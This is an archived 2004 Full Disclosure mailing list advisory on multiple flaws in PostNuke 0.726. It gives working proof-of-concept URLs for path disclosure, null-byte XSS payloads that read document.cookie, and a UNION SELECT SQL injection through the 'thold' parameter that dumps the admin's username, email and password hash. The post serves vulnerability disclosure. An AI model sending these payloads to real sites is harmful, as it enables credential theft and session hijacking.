Full Disclosure mailing list archives
[waraxe-2004-SA#020 - Multiple vulnerabilities in PostNuke 0.726 Phoenix]
From: Janek Vind <come2waraxe () yahoo com>
Date: Sun, 18 Apr 2004 12:33:22 -0700 (PDT)
{================================================================================} { [waraxe-2004-SA#020] } {================================================================================} { } { [ Multiple vulnerabilities in PostNuke 0.726 Phoenix ] } { } {================================================================================} Author: Janek Vind "waraxe" Date: 18. April 2004 Location: Estonia, Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=20 Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PostNuke: The Phoenix Release (0.7.2.6) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A. Full path disclosure: A1 - legacy code http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice Fatal error: Call to undefined function: deletenotice() in D:\apache_wwwroot\postnuke0726\admin.php on line 87 It seems, that this function - deletenotice() - is removed in new versions, but reference still exists. Btw, anyone without any authentication can provoke this error, not only admins. A2 - path disclosure through sql injection http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p Fatal error: Call to a member function on a non-object in D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php on line 454 This is sql injection bug through variable named "thold", but here we use it for path disclosure. B. Cross-site scripting aka XSS: Exploiting XSS in PostNuke is difficult task, because PostNuke will filter out most of the "useful" tags, like <script>. But anyway, there exists XSS bugs and they can be exploited, using some custom technics (therefore loosing crossbrowser compatibility of the sploit). B1 - XSS through unsanitaized variable "$order" http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s%00cript>ppp&thold=99 http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie); C. Sql injection: C1 - critical sql injection in NS-Polls This is devastating case of the sql injection, because it can be used to pull out from database ANY data, attacker needs. http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/* ... and we will see admin's username, email and password's md5 hash in plaintext ;) Remark - this sploit needs mysql version >=4.x with UNION functionality enabled! Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused! Special greets to UT Bee Clan members at http://bees.tk ! "Boom!!" ;) Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe () yahoo com Janek Vind "waraxe" Homepage: http://www.waraxe.us/ ---------------------------------- [ EOF ] ------------------------------------ __________________________________ Do you Yahoo!? Yahoo! Photos: High-quality 4x6 digital prints for 25ยข http://photos.yahoo.com/ph/print_splash _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [waraxe-2004-SA#020 - Multiple vulnerabilities in PostNuke 0.726 Phoenix] Janek Vind (Apr 18)